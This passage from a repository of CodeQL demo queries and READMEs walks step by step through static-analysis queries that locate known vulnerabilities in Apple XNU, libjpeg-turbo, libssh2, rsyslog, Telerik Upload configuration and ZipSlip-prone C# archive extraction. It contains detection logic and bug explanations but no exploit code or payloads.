13 | * The previous query, 00_mbuf_copydata_tainted_size.ql, discovered some
14 | * dodgy looking code in `icmp_error`. But is it exploitable? To find out
15 | * we need to figure if the zero'th parameter of `icmp_error`, an `mbuf`
16 | * named `n`, is attacker-controllable.
17 | *
18 | * This initial query looks for expression that flows to parameter `n`.
19 | */
20 |
/**
 * Data-flow configuration: from any expression to the first parameter of
 * `icmp_error`.
 */
class Config extends DataFlow::Configuration {
  Config() { this = "Paths from ip_input to icmp_error" }

  /**
   * Sources: every expression in the database. Deliberately unconstrained as
   * a first step, to see where `n` can come from at all; the next iteration
   * narrows this down to `ip_input`.
   */
  override predicate isSource(DataFlow::Node source) { exists(Expr e | e = source.asExpr()) }

  /**
   * Sinks: parameter 0 of `icmp_error` (`struct mbuf *n`). Matching is by
   * function name and parameter position only.
   */
  override predicate isSink(DataFlow::Node sink) {
    exists(Parameter p | p = sink.asParameter() |
      p.getFunction().hasName("icmp_error") and
      p.getIndex() = 0
    )
  }
}
37 |
// Report each path; the alert is attached to the source, since the question
// here is where the `mbuf` comes from rather than where it ends up.
from DataFlow::PathNode source, DataFlow::PathNode sink, Config cfg
where cfg.hasFlowPath(source, sink)
select source, source, sink, "Expression flows to icmp_error."
41 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/02_paths_to_icmp_error.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 02 Paths from ip_input to icmp_error
3 | * @description Find data-flow paths that lead from ip_input to the first parameter of icmp_error.
4 | * @kind path-problem
5 | * @problem.severity warning
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.dataflow.DataFlow
10 | import DataFlow::PathGraph
11 |
12 | /*
13 | * The previous iteration of this query found every expression that flows
14 | * to parameter `n` of `icmp_error`. The most interesting looking results
15 | * were the ones that started in the function `ip_input` because that is
16 | * where incoming IP packets are handled. So we restrict `isSource` to only
17 | * expressions from `ip_input`.
18 | */
19 |
/**
 * Data-flow configuration: from expressions inside `ip_input` to the first
 * parameter of `icmp_error`.
 */
class Config extends DataFlow::Configuration {
  Config() { this = "Paths from ip_input to icmp_error" }

  /**
   * Sources: any expression whose enclosing function is `ip_input`, the
   * function that handles incoming IP packets. This is still broad (every
   * expression in that function), but it limits paths to ones that start
   * where attacker-supplied packets enter.
   */
  override predicate isSource(DataFlow::Node source) {
    exists(Expr e | e = source.asExpr()) and
    source.getFunction().hasName("ip_input")
  }

  /**
   * Sinks: parameter 0 of `icmp_error` (`struct mbuf *n`). Matching is by
   * function name and parameter position only.
   */
  override predicate isSink(DataFlow::Node sink) {
    exists(Parameter p | p = sink.asParameter() |
      p.getFunction().hasName("icmp_error") and
      p.getIndex() = 0
    )
  }
}
36 |
// Report each path from `ip_input` to `icmp_error`; the alert is attached
// to the source expression.
from DataFlow::PathNode source, DataFlow::PathNode sink, Config cfg
where cfg.hasFlowPath(source, sink)
select source, source, sink, "Expression flows to icmp_error."
40 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md:
--------------------------------------------------------------------------------
1 | # Apple XNU icmp_error CVE-2018-4407
2 |
3 | Use [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.6-codeql-database/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo.
4 |
5 | There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://securitylab.github.com/research/apple-xnu-exploit-icmp-poc/), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/ArrayIndexMightOverflow.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Array index might overflow
3 | * @description An array indexing expression of the form
4 | * x[i+j] could cause an out-of-bounds write.
5 | * @kind problem
6 | * @problem.severity warning
7 | * @id apple-xnu/cpp/array-index-might-overflow
8 | */
9 |
10 | import cpp
11 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
12 |
// Find an assignment like this: x[i+j] = v
//
// Only writes are considered (the array expression must be the left-hand
// side of an assignment); reads such as `v = x[i+j]` are not reported.
// `BinaryArithmeticOperation` covers `-`, `*`, `/` and `%` as well as `+`,
// and `convertedExprMightOverflow` asks SimpleRangeAnalysis whether the
// index arithmetic can overflow in the type it is evaluated in. An index
// that wraps can become negative, which is an out-of-bounds write.
from Assignment assign, ArrayExpr access, BinaryArithmeticOperation idx
where
  access = assign.getLValue() and
  idx = access.getArrayOffset() and
  convertedExprMightOverflow(idx)
select idx, "Array index might overflow"
19 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/InfiniteLoop.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Infinite loop
3 | * @description Updating a loop index with a compound assignment
4 | * could cause non-termination.
5 | * @kind problem
6 | * @problem.severity warning
7 | * @id apple-xnu/cpp/infinite-loop
8 | */
9 |
10 | import cpp
11 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
12 |
// Find loops like this:
//   while (x) { ...; x -= n; }
//
// i.e. a loop whose condition tests `v` (directly or as an operand of a
// comparison) and whose body updates `v` with a compound arithmetic
// assignment (`+=`, `-=`, ...) whose right-hand side, according to range
// analysis, may be zero. A zero step leaves `v` unchanged, so the condition
// never changes and the loop never terminates.
//
// Caveats: `v` may be a field, in which case the condition and the update
// are only related by the field's identity (the qualifier is not compared);
// and `getAChild*()` also descends into nested loops in the body.
from Loop loop, Variable v, AssignArithmeticOperation update
where
  (
    loop.getCondition() = v.getAnAccess()
    or
    loop.getCondition().(ComparisonOperation).getAnOperand() = v.getAnAccess()
  ) and
  // The compound assignment targets `v` and sits somewhere in the loop body.
  update.getLValue() = v.getAnAccess() and
  update = loop.getStmt().getAChild*() and
  // Zero lies within the inferred range of the step.
  lowerBound(update.getRValue()) <= 0 and
  upperBound(update.getRValue()) >= 0
select loop, "Loop might not terminate due to this $@.", update, "assignment"
24 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md:
--------------------------------------------------------------------------------
1 | https://securitylab.github.com/research/CVE-2018-4249-apple-xnu-packet-mangler/
2 |
3 | There were multiple bugs in `packet_mangler.c`. One of the infinite loop bugs was fixed in macOS High Sierra 10.13.2. The other bugs were fixed in macOS High Sierra 10.13.5.
4 |
For a demo, the best query to show is `tcphdr_mbuf_copydata.ql`, because it uses taint tracking to show the stack buffer overflow.
6 |
`ArrayIndexMightOverflow.ql` is a simplified version of the query that originally led us to look at this code. It looks for array indices of the form `x[i+j]`, on the left-hand side of an assignment, where the index arithmetic might overflow (and so, for example, wrap around to a negative value).
8 |
`InfiniteLoop.ql` is a query inspired by one of the bugs in this code: the loop might not terminate because the loop counter is updated with a compound assignment (`+=`). We wrote an exploit which causes the right-hand side of the assignment to be zero, which means that the loop runs forever.
10 |
11 | All three queries find results in [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13).
12 |
13 | The queries also find results in [this newer snapshot for 10.13.3](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip). Apple thought they had fixed the infinite loop bug in 10.13.2, by changing the loop condition to a `>`. They were wrong.
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/tcphdr_mbuf_copydata.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name tcphdr flow to mbuf_copydata
3 | * @description Expressions of type tcphdr usually contain values that can
4 | * be controlled by an attacker. Therefore, it is dangerous to
5 | * use any of those values as the size argument of
6 | * mbuf_copydata.
7 | * @kind path-problem
8 | * @problem.severity warning
9 | * @id apple-xnu/cpp/tcphdr_mbuf_copydata
10 | */
11 |
12 | import cpp
13 | import semmle.code.cpp.dataflow.TaintTracking
14 | import DataFlow::PathGraph
15 |
/**
 * Taint configuration: from any expression of type `tcphdr` to the size
 * argument of `mbuf_copydata`.
 */
class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  /**
   * Sources: any expression whose type, after `stripType` (so that e.g.
   * `struct tcphdr *` should match too), is named `tcphdr`. A TCP header is
   * parsed straight out of the incoming packet, so every field read from it
   * is treated as attacker-controlled.
   */
  override predicate isSource(DataFlow::Node source) {
    exists(Type t | t = source.asExpr().getType().stripType() | t.getName() = "tcphdr")
  }

  /**
   * Sinks: the third argument (index 2, the length) of a call to
   * `mbuf_copydata`. An attacker-chosen length here can overrun the
   * destination buffer.
   */
  override predicate isSink(DataFlow::Node sink) {
    sink.asExpr() = any(FunctionCall c | c.getTarget().hasName("mbuf_copydata")).getArgument(2)
  }
}
29 |
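// Report each tainted path from a `tcphdr` value to the size argument of
// `mbuf_copydata`. The alert is attached to the sink and links back to the
// source, so the reader can see which header field the length came from.
// (The original message was just "tcp", which tells the reader nothing.)
from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink,
  "Size argument of mbuf_copydata is derived from $@, which may be attacker-controlled.",
  source.getNode(), "a tcphdr value"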
33 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libjpeg-turbo-oob/01_find_colormap_index.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Find expressions of the form `base->colormap[i][j]`
//
// `outer` is the `[j]` indexing, whose base `inner` is the `[i]` indexing
// of a field named `colormap`. Only the field name is checked here; the
// declaring struct is not, so any `colormap` field in the code base matches.
from ArrayExpr outer, ArrayExpr inner
where
  outer.getArrayBase() = inner and
  inner.getArrayBase().(FieldAccess).getTarget().hasName("colormap")
select outer, "Indexing into colormap."
9 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libjpeg-turbo-oob/02a_find_guarded_colormap_index.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
3 | import semmle.code.cpp.controlflow.Guards
4 | import Options
5 |
// Find expressions of the form `base->colormap[i][j]` where
// `j` is checked against `base->cmap_length`

/**
 * Gets an expression of the form `base->fieldName`, where `base`
 * is of type `_bmp_source_struct`.
 *
 * `base` is a global value number rather than an expression, so accesses
 * through different expressions that denote the same struct pointer are
 * treated alike; likewise the result is any expression with the same value
 * number as the field access, not just the access itself.
 */
Expr bmpSourceStructField(GVN base, string fieldName) {
  exists(FieldAccess fa, Field f |
    f = fa.getTarget() and
    f.hasName(fieldName) and
    f.getDeclaringType().hasName("_bmp_source_struct") and
    globalValueNumber(fa.getQualifier()) = base and
    globalValueNumber(result) = globalValueNumber(fa)
  )
}
21 |
// `outer` is `colormap[i][j]`, `inner` is `colormap[i]`, both on the same
// `_bmp_source_struct` (`base`). The index `j` (value number `index`) must be
// guarded by a condition that ensures `j < base->cmap_length` on the path to
// the access.
//
// Note that `ensuresLt` only establishes the upper bound; whether a negative
// `j` is possible depends on the index's type and is not checked here.
from ArrayExpr outer, ArrayExpr inner, GVN base, GVN index
where
  outer.getArrayBase() = inner and
  bmpSourceStructField(base, "colormap") = inner.getArrayBase() and
  index.getAnExpr() = outer.getArrayOffset() and
  exists(GuardCondition gc |
    gc.ensuresLt(index.getAnExpr(), bmpSourceStructField(base, "cmap_length"), 0,
      inner.getBasicBlock(), true)
  )
select outer, "Guarded indexing into colormap."
31 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/00_error_codes.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 00_error_codes
3 | */
4 |
5 | import cpp
6 |
// Return statements whose returned expression is a negative integer
// constant, for example `return -1;`. Such values are candidate error codes.
from ReturnStmt ret, int returned
where
  returned = ret.getExpr().getValue().toInt() and
  returned < 0
select ret
16 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/01_error_codes_call.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 01_error_codes_call
3 | */
4 |
5 | import cpp
6 |
// Extends the previous query: pair each negative-constant `return` with the
// calls to the function that contains it.
from ReturnStmt ret, FunctionCall call, Function callee
where
  ret.getExpr().getValue().toInt() < 0 and
  callee = ret.getEnclosingFunction() and
  callee = call.getTarget()
select ret, call
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 02_eating_error_codes
3 | */
4 |
5 | import cpp
6 |
// Calls to functions that can return a negative error code, where the call
// result is converted to an unsigned integral type: the negative value wraps
// and the error is silently lost.
from FunctionCall call, ReturnStmt ret, IntegralType resultType
where
  ret.getExpr().getValue().toInt() < 0 and
  ret.getEnclosingFunction() = call.getTarget() and
  resultType = call.getFullyConverted().getType().getUnderlyingType() and
  resultType.isUnsigned()
select call, ret
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 03_eating_error_codes_localflow
3 | */
4 |
5 | import cpp
6 | import semmle.code.cpp.dataflow.DataFlow
7 |
// Query 02 only caught a call whose result is converted to unsigned at the
// call site itself; it misses the two-step form
//
//   int r = f();
//   unsigned int x = r;
//
// Here local data flow connects the call (source) to the expression that is
// eventually converted to an unsigned type (sink).
from FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink, IntegralType sinkType
where
  ret.getExpr().getValue().toInt() < 0 and
  ret.getEnclosingFunction() = call.getTarget() and
  call = source.asExpr() and
  DataFlow::localFlow(source, sink) and
  sinkType = sink.asExpr().getFullyConverted().getType().getUnderlyingType() and
  sinkType.isUnsigned()
select source, sink
25 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 04_eating_error_codes_localflow_rangeanalysis
3 | */
4 |
5 | import cpp
6 | import semmle.code.cpp.dataflow.DataFlow
7 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
8 |
// Query 03 treats every unsigned-typed expression reached by local flow as a
// sink, which gives noisy results. The place that matters is the actual
// signed-to-unsigned conversion, and only when the converted value may still
// be negative. Range analysis supplies that second condition, so a value that
// was already checked, as in
//
//   int r = f();
//   if (r < 0) return -1;
//   unsigned int x = r;
//
// is no longer reported.
from FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink, Expr sinkExpr
where
  ret.getExpr().getValue().toInt() < 0 and
  ret.getEnclosingFunction() = call.getTarget() and
  call = source.asExpr() and
  DataFlow::localFlow(source, sink) and
  sinkExpr = sink.asExpr() and
  sinkExpr.getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() and
  lowerBound(sinkExpr) < 0
select source, sink
30 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md:
--------------------------------------------------------------------------------
1 | # Eating error codes in libssh2
2 |
3 | Download this [snapshot](https://github.com/github/securitylab/releases/download/libssh2-codeql-database/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo.
4 |
5 | This demo shows how to develop, step-by-step, the query from the [blog post](https://blog.semmle.com/libssh2-integer-overflow/) about libssh2 CVE-2019-13115. This query did not find the bug that caused the CVE. It is instead about doing variant analysis on a bug that we noticed on the development branch of libssh2. We sent the query results to the libssh2 development team and they were able to fix all the variants before the next version of libssh2 was released.
6 |
7 | The problem is that `_libssh2_get_c_string` returns a negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored.
8 |
9 | For a shorter demo, stop at step 02. Steps 03 and 04 make the query more sophisticated by adding local data flow and range analysis.
10 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: codeql-demos-cpp
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-cpp
4 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/queries.xml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/01_find_snprintf.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/*
 * Find every call to `snprintf`.
 *
 * This first step could be done with grep, but grep does not see through
 * macros. curl, for instance, routes `snprintf` through a macro:
 *
 *   https://github.com/curl/curl/blob/87501e57f1c166cb250111af54e0470ab8b2099c/lib/curl_printf.h#L42
 */
from FunctionCall call, Function callee
where
  callee = call.getTarget() and
  callee.hasName("snprintf")
select call
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/02_find_snprintf_with_result.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/*
 * Only code that inspects the return value of `snprintf` can be affected,
 * so drop the calls whose result is discarded (those in a "void context").
 */
from FunctionCall call
where
  call.getTarget().hasName("snprintf") and
  not exists(ExprInVoidContext discarded | discarded = call)
select call
12 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/03_find_snprintf_with_result_and_string.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/*
 * Restrict to format strings that contain `%s`. Other conversions such as
 * `%d` change the output length by only a few characters, whereas `%s` can
 * grow it arbitrarily, so a `%s` call is both far more likely to trigger the
 * truncated-length bug and gives an attacker much more control over what is
 * written past the buffer.
 */
from FunctionCall call, string format
where
  call.getTarget().hasName("snprintf") and
  not call instanceof ExprInVoidContext and
  format = call.getArgument(2).getValue() and
  format.regexpMatch("(?s).*%s.*")
select call
16 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/04_find_snprintf_with_result_and_string_and_local_taint.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.TaintTracking
3 |
/*
 * Look for taint flowing from the result of `snprintf` back into the size
 * argument (argument 1) of the same call. The `ExprInVoidContext` filter is
 * no longer needed: a call whose result is unused has no outgoing flow.
 */
from FunctionCall call, DataFlow::Node source, DataFlow::Node sink
where
  call.getTarget().hasName("snprintf") and
  call.getArgument(2).getValue().regexpMatch("(?s).*%s.*") and
  source.asExpr() = call and
  sink.asExpr() = call.getArgument(1) and
  TaintTracking::localTaint(source, sink)
select call
17 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/05_find_snprintf_with_result_and_string_and_local_taint_ub.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
3 | import semmle.code.cpp.dataflow.TaintTracking
4 |
/*
 * Use `SimpleRangeAnalysis` to compute an upper bound for the size argument.
 * Here the bound is only added as an extra result column, but it could also
 * be used to discard calls whose size is properly bounds-checked.
 *
 * Note: adding the upper bound to an earlier query in this sequence is also
 * instructive, because it shows how tight the inferred bounds already are
 * for some of the calls.
 */
from FunctionCall call, DataFlow::Node source, DataFlow::Node sink, Expr sizeArg
where
  call.getTarget().hasName("snprintf") and
  call.getArgument(2).getValue().regexpMatch("(?s).*%s.*") and
  sizeArg = call.getArgument(1) and
  source.asExpr() = call and
  sink.asExpr() = sizeArg and
  TaintTracking::localTaint(source, sink)
select call, upperBound(sizeArg.getFullyConverted())
22 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/librelp-buffer-overflow-cve-2018-1000140/).
2 |
3 | This bug was found by one of [CodeQL](https://codeql.github.com/)'s default queries. However, it also makes a good example of using QL interactively. The queries in this directory show how to develop the query step by step.
4 |
5 | Use [this snapshot](https://github.com/github/securitylab/releases/download/rsyslog-codeql-database/rsyslog-all-revision-2018-April-27--14-12-31.zip).
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/README.md:
--------------------------------------------------------------------------------
1 | # Rsyslog demo video
2 |
3 | A recording of this demo can be found [here](https://youtu.be/gfaCZoxH_u4).
4 |
5 | `rsyslog.srt` (in this directory) is the subtitles file for the video.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/01_find_data_input.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/**
 * A call to one of the read-style functions `pread`, `read`, `readv`,
 * `recvfrom`, `recvmsg` or `recv`, i.e. a point where external data enters
 * the program.
 */
class ReadFunctionCall extends FunctionCall {
  ReadFunctionCall() {
    exists(string name |
      name = "pread" or
      name = "read" or
      name = "readv" or
      name = "recvfrom" or
      name = "recvmsg" or
      name = "recv"
    |
      this.getTarget().hasName(name)
    )
  }
}
13 |
// List every read call together with its file and enclosing function.
from ReadFunctionCall readCall, Function enclosing
where enclosing = readCall.getEnclosingFunction()
select readCall.getFile(), enclosing, readCall
16 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/02_find_data_pointer_usage.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/** An access to a field named `pszRawMsg` (the raw message buffer). */
class RawMessageFieldAccess extends FieldAccess {
  RawMessageFieldAccess() { this.getTarget().hasName("pszRawMsg") }
}
8 |
/** A function whose body contains at least one `pszRawMsg` field access. */
class RawMsgAccessFunction extends Function {
  RawMsgAccessFunction() {
    exists(RawMessageFieldAccess access | this = access.getEnclosingFunction())
  }
}
14 |
// Functions that touch the raw message, with the file they live in.
from RawMsgAccessFunction fn
select fn.getFile(), fn
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/03_find_data_pointer_usage_extended.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/** An access to a field named `pszRawMsg` (the raw message buffer). */
class RawMessageFieldAccess extends FieldAccess {
  RawMessageFieldAccess() { this.getTarget().hasName("pszRawMsg") }
}
8 |
/**
 * A function that reaches the raw message either directly, through a
 * `pszRawMsg` field access, or indirectly, by calling `getMSG` or
 * `getRawMsg`.
 */
class RawMsgAccessFunction extends Function {
  RawMsgAccessFunction() {
    exists(RawMessageFieldAccess access | this = access.getEnclosingFunction())
    or
    exists(FunctionCall call, string callee |
      this = call.getEnclosingFunction() and
      call.getTarget().hasName(callee) and
      (callee = "getMSG" or callee = "getRawMsg")
    )
  }
}
22 |
// Functions that reach the raw message, with the file they live in.
from RawMsgAccessFunction fn
select fn.getFile(), fn
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/04_find_parsers.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/** A function named `parse` or `parse2`, i.e. a candidate message parser. */
class ParseFunction extends Function {
  ParseFunction() { this.hasName("parse") or this.hasName("parse2") }
}
9 |
// Candidate parser functions, with the file they live in.
from ParseFunction parser
select parser.getFile(), parser
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/05_find_tainted_iterations.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.DataFlow
3 | import semmle.code.cpp.dataflow.TaintTracking
4 |
/** An access to a field named `pszRawMsg` (the raw message buffer). */
class RawMessageFieldAccess extends FieldAccess {
  RawMessageFieldAccess() { this.getTarget().hasName("pszRawMsg") }
}
10 |
// `while` loops whose condition (or any sub-expression of it) is locally
// tainted by a `pszRawMsg` field access: the loop's trip count depends on
// the raw message.
from DataFlow::Node source, DataFlow::Node sink, RawMessageFieldAccess access, WhileStmt loop, Expr condPart
where
  source.asExpr() = access and
  condPart = loop.getCondition().getAChild*() and
  sink.asExpr() = condPart and
  TaintTracking::localTaint(source, sink)
select "Loop iterates data from:", source, sink
17 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/rsyslog_CVE-2019-17041/README.md:
--------------------------------------------------------------------------------
1 | # Bug Hunting with CodeQL, an rsyslog Case Study
2 |
3 | This repo contains the CodeQL queries used in the [Bug Hunting with CodeQL, an rsyslog Case Study](https://securitylab.github.com/research/bug-hunting-codeql-rsyslog) blog post.
4 |
5 | - [Discovering program input](01_find_data_input.ql)
6 | - [Data flow exploration](02_find_data_pointer_usage.ql)
7 | - [Data flow exploration (extended)](03_find_data_pointer_usage_extended.ql)
8 | - [Finding data parsers](04_find_parsers.ql)
9 | - [Finding tainted loops](05_find_tainted_iterations.ql)
10 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | ql-demos-csharp
4 |
5 |
6 |
7 |
8 |
9 |
10 | com.semmle.plugin.qdt.core.qlnature
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/.qlpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | com.semmle.code.csharp.library
5 |
6 | com.semmle.code.csharp.dbscheme
7 |
8 | csharp
9 |
10 |
11 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/TelerikRepeatedEncryptionKey/TelerikRepeatedEncryptionKey.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Non unique encryption keys in Telerik Upload in ASP.NET
3 | * @description Setting a weak encryption key for ASP.NET Telerik Upload may allow attacks against
4 | * the application.
5 | * @kind problem
6 | */
7 |
8 | import csharp
9 |
// Two XML `key` attributes naming the Telerik Upload encryption key and hash
// key respectively, whose elements carry the same `value`: the two secrets
// should be distinct.
from XMLAttribute encKey, XMLAttribute hashKey, string sharedValue
where
  encKey.getName() = "key" and
  encKey.getValue() = "Telerik.AsyncUpload.ConfigurationEncryptionKey" and
  hashKey.getName() = "key" and
  hashKey.getValue() = "Telerik.Upload.ConfigurationHashKey" and
  sharedValue = encKey.getElement().getAttributeValue("value") and
  sharedValue = hashKey.getElement().getAttributeValue("value")
select encKey,
  "Non unique (duplicated) Telerik Upload encryption key (" + sharedValue + ")."
20 |
21 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/01_Sources.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 |
// First cut at the sources: every access to a property named `FullName`.
from Property fullName
where fullName.hasName("FullName")
select fullName.getAnAccess()
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/02_Sources.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 |
// Narrow the sources to `ZipArchiveEntry.FullName`, the attacker-controlled
// path stored in the archive.
from Property fullName, ValueOrRefType owner
where
  fullName.hasName("FullName") and
  owner = fullName.getDeclaringType() and
  owner.hasName("ZipArchiveEntry")
select fullName.getAnAccess()
8 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/03_Sinks.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 |
// Sinks: calls to any method named `ExtractToFile`.
from MethodCall extractCall, Method target
where
  target = extractCall.getTarget() and
  target.hasName("ExtractToFile")
select extractCall
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/04_SinkArgument.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 |
// The sink argument: argument 1 of each `ExtractToFile` call.
from MethodCall extractCall, Method target
where
  target = extractCall.getTarget() and
  target.hasName("ExtractToFile")
select extractCall.getArgument(1)
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/05_LocalFlow.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 | import semmle.code.csharp.dataflow.TaintTracking
3 |
// Local taint from a `ZipArchiveEntry.FullName` access to any argument of an
// `ExtractToFile` call.
from DataFlow::Node source, DataFlow::Node sink, MethodCall extractCall, Property fullName
where
  extractCall.getTarget().hasName("ExtractToFile") and
  sink.asExpr() = extractCall.getAnArgument() and
  fullName.hasName("FullName") and
  fullName.getDeclaringType().hasName("ZipArchiveEntry") and
  source.asExpr() = fullName.getAnAccess() and
  TaintTracking::localTaint(source, sink)
select sink, "ZipSlip from $@.", source, source.toString()
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/ZipSlip/06_GlobalFlow.ql:
--------------------------------------------------------------------------------
1 | import csharp
2 | import semmle.code.csharp.dataflow.TaintTracking
3 |
/**
 * Global taint-tracking configuration: from accesses to
 * `ZipArchiveEntry.FullName` to any argument of an `ExtractToFile` call.
 */
class ZipSlipTaintTracking extends TaintTracking::Configuration {
  ZipSlipTaintTracking() { this = "Zip Slip taint tracking" }

  override predicate isSource(DataFlow::Node node) {
    exists(Property fullName |
      node.asExpr() = fullName.getAnAccess() and
      fullName.hasName("FullName") and
      fullName.getDeclaringType().hasName("ZipArchiveEntry")
    )
  }

  override predicate isSink(DataFlow::Node node) {
    exists(MethodCall extractCall |
      node.asExpr() = extractCall.getAnArgument() and
      extractCall.getTarget().hasName("ExtractToFile")
    )
  }
}
21 |
// Report every source/sink pair connected by the configuration above.
from ZipSlipTaintTracking cfg, DataFlow::Node source, DataFlow::Node sink
where cfg.hasFlow(source, sink)
select sink, "Zip Slip vulnerability from $@.", source, source.toString()
25 |
--------------------------------------------------------------------------------
/CodeQL_Queries/csharp/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: codeql-demos-csharp
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-csharp
4 |
--------------------------------------------------------------------------------
